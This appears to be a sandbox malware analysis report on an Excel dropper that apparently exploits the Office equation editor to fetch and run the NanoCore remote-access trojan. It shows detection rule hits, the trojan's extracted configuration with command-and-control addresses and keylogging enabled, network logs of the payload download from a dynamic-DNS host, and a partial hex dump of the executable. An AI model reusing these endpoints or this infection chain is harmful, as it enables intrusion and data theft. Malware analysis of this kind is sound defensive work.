5.2.RegSvcs.exe.520000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.RegSvcs.exe.520000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
5.2.RegSvcs.exe.3883020.24.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.RegSvcs.exe.3883020.24.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
5.2.RegSvcs.exe.3883020.24.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegSvcs.exe.2160000.16.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2160000.16.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x41ee:$x2: NanoCore.ClientPluginHost 0x7641:$s4: PipeCreated 0x4218:$s5: IClientLoggingHost
5.2.RegSvcs.exe.2200000.17.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2200000.17.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
5.2.RegSvcs.exe.2204c9f.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2204c9f.19.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
5.2.RegSvcs.exe.2200000.17.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2200000.17.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
5.2.RegSvcs.exe.3883020.24.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x379fb:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x37a15:$x2: IClientNetworkHost
5.2.RegSvcs.exe.3883020.24.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x379fb:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x3ad38:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x379e8:$s5: IClientLoggingHost
5.2.RegSvcs.exe.3883020.24.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.RegSvcs.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegSvcs.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.RegSvcs.exe.2104629.14.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2104629.14.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
5.2.RegSvcs.exe.2104629.14.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3940110.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.3940110.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.vbc.exe.3940110.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.3940110.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.RegSvcs.exe.2100000.13.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
5.2.RegSvcs.exe.2100000.13.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
5.2.RegSvcs.exe.2100000.13.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.RegSvcs.exe.26a6198.22.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14de5:$x1: NanoCore.ClientPluginHost 0x21f57:$x1: NanoCore.ClientPluginHost 0x284ad:$x1: NanoCore.ClientPluginHost 0x2e488:$x1: NanoCore.ClientPluginHost 0x37efb:$x1: NanoCore.ClientPluginHost 0x4232f:$x1: NanoCore.ClientPluginHost 0x4d319:$x1: NanoCore.ClientPluginHost 0x590c7:$x1: NanoCore.ClientPluginHost 0x64e56:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e12:$x2: IClientNetworkHost 0x21f90:$x2: IClientNetworkHost 0x284e6:$x2: IClientNetworkHost 0x38058:$x2: IClientNetworkHost 0x42368:$x2: IClientNetworkHost 0x4d333:$x2: IClientNetworkHost 0x590e1:$x2: IClientNetworkHost 0x64e93:$x2: IClientNetworkHost
5.2.RegSvcs.exe.26a6198.22.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14dbf:$a: NanoCore 0x14de5:$a: NanoCore 0x14e41:$a: NanoCore 0x21c9f:$a: NanoCore 0x21cf8:$a: NanoCore 0x21d2b:$a: NanoCore 0x21f57:$a: NanoCore 0x21fd3:$a: NanoCore 0x225ec:$a: NanoCore 0x22735:$a: NanoCore 0x22c09:$a: NanoCore 0x22ef0:$a: NanoCore 0x22f07:$a: NanoCore 0x284ad:$a: NanoCore 0x28527:$a: NanoCore 0x2e488:$a: NanoCore 0x2e4d2:$a: NanoCore 0x2f12c:$a: NanoCore
5.2.RegSvcs.exe.26b23d8.20.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d17:$x1: NanoCore.ClientPluginHost 0x1c26d:$x1: NanoCore.ClientPluginHost 0x22248:$x1: NanoCore.ClientPluginHost 0x2bcbb:$x1: NanoCore.ClientPluginHost 0x360ef:$x1: NanoCore.ClientPluginHost 0x410d9:$x1: NanoCore.ClientPluginHost 0x4ce87:$x1: NanoCore.ClientPluginHost 0x58c16:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d50:$x2: IClientNetworkHost 0x1c2a6:$x2: IClientNetworkHost 0x2be18:$x2: IClientNetworkHost 0x36128:$x2: IClientNetworkHost 0x410f3:$x2: IClientNetworkHost 0x4cea1:$x2: IClientNetworkHost 0x58c53:$x2: IClientNetworkHost
5.2.RegSvcs.exe.26b23d8.20.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a5f:$a: NanoCore 0x15ab8:$a: NanoCore 0x15aeb:$a: NanoCore 0x15d17:$a: NanoCore 0x15d93:$a: NanoCore 0x163ac:$a: NanoCore 0x164f5:$a: NanoCore 0x169c9:$a: NanoCore 0x16cb0:$a: NanoCore 0x16cc7:$a: NanoCore 0x1c26d:$a: NanoCore 0x1c2e7:$a: NanoCore 0x22248:$a: NanoCore 0x22292:$a: NanoCore 0x22eec:$a: NanoCore 0x2bcbb:$a: NanoCore 0x2bda5:$a: NanoCore 0x2cc1c:$a: NanoCore
5.2.RegSvcs.exe.26a1340.21.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x9a13:$x1: NanoCore.ClientPluginHost 0x19c3d:$x1: NanoCore.ClientPluginHost 0x26daf:$x1: NanoCore.ClientPluginHost 0x2d305:$x1: NanoCore.ClientPluginHost 0x332e0:$x1: NanoCore.ClientPluginHost 0x3cd53:$x1: NanoCore.ClientPluginHost 0x47187:$x1: NanoCore.ClientPluginHost 0x52171:$x1: NanoCore.ClientPluginHost 0x5df1f:$x1: NanoCore.ClientPluginHost 0x69cae:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x9a3d:$x2: IClientNetworkHost 0x19c6a:$x2: IClientNetworkHost 0x26de8:$x2: IClientNetworkHost 0x2d33e:$x2: IClientNetworkHost 0x3ceb0:$x2: IClientNetworkHost 0x471c0:$x2: IClientNetworkHost 0x5218b:$x2: IClientNetworkHost 0x5df39:$x2: IClientNetworkHost 0x69ceb:$x2: IClientNetworkHost
5.2.RegSvcs.exe.26a1340.21.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99ee:$a: NanoCore 0x9a13:$a: NanoCore 0x9a6c:$a: NanoCore 0x19c17:$a: NanoCore 0x19c3d:$a: NanoCore 0x19c99:$a: NanoCore 0x26af7:$a: NanoCore 0x26b50:$a: NanoCore 0x26b83:$a: NanoCore 0x26daf:$a: NanoCore 0x26e2b:$a: NanoCore 0x27444:$a: NanoCore 0x2758d:$a: NanoCore 0x27a61:$a: NanoCore 0x27d48:$a: NanoCore 0x27d5f:$a: NanoCore 0x2d305:$a: NanoCore
Click to see the 84 entries

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 172.245.45.28, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2280, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2280, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2360, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000005.00000002.2599211155.000000000387F000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for domain / URL

Show sources

Source: 79.134.225.26

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe

Virustotal: Detection: 17%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: Original title deed.xlsx

ReversingLabs: Detection: 17%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2599211155.000000000387F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3887649.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2104629.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.raw.unpack, type: UNPACKEDPE

Source: 5.2.RegSvcs.exe.2100000.13.unpack	Avira: Label: TR/NanoCore.fadte
Source: 5.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\RegSvcs.pdbF source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: {indows\RegSvcs.pdbpdbvcs.pdbE source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000005.00000002.2597584693.0000000000780000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 00000005.00000002.2597616840.00000000007B8000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000004.00000002.2395632648.0000000002090000.00000002.00000001.sdmp, RegSvcs.exe, 00000005.00000002.2597779928.0000000002050000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 4x nop then mov esp, ebp

5_2_003FAF31

Source: global traffic

DNS query: name: myhostisstillgood11.zapto.org

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 172.245.45.28:80

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 172.245.45.28:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 3132 WEB-CLIENT PNG large image width download attempt 172.245.45.28:80 -> 192.168.2.22:49166
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49167 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49168 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49170 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49176 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49177 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49178 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49179 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49180 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49181 -> 79.134.225.26:1133
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49182 -> 79.134.225.26:1133

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: 79.134.225.26
Source: Malware configuration extractor	URLs: nassiru1166main.ddns.net

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 79.134.225.26:1133

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 08:44:28 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Mon, 03 May 2021 07:22:11 GMTETag: "116c00-5c167d1eb0284"Accept-Ranges: bytesContent-Length: 1141760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a3 a4 8f 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 58 11 00 00 12 00 00 00 00 00 00 92 77 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 77 11 00 4f 00 00 00 00 80 11 00 d0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 57 11 00 00 20 00 00 00 58 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0e 00 00 00 80 11 00 00 10 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 6a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 77 11 00 00 00 00 00 48 00 00 00 02 00 05 00 04 84 00 00 3c 99 00 00 03 00 00 00 01 00 00 06 40 1d 01 00 00 5a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 60 01 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a

Source: Joe Sandbox View	IP Address: 79.134.225.26 79.134.225.26
Source: Joe Sandbox View	IP Address: 172.245.45.28 172.245.45.28

Source: Joe Sandbox View	ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: GET /dashboard/docs/images/nd.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: myhostisstillgood11.zapto.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
Source: unknown	TCP traffic detected without corresponding DNS query: 79.134.225.26
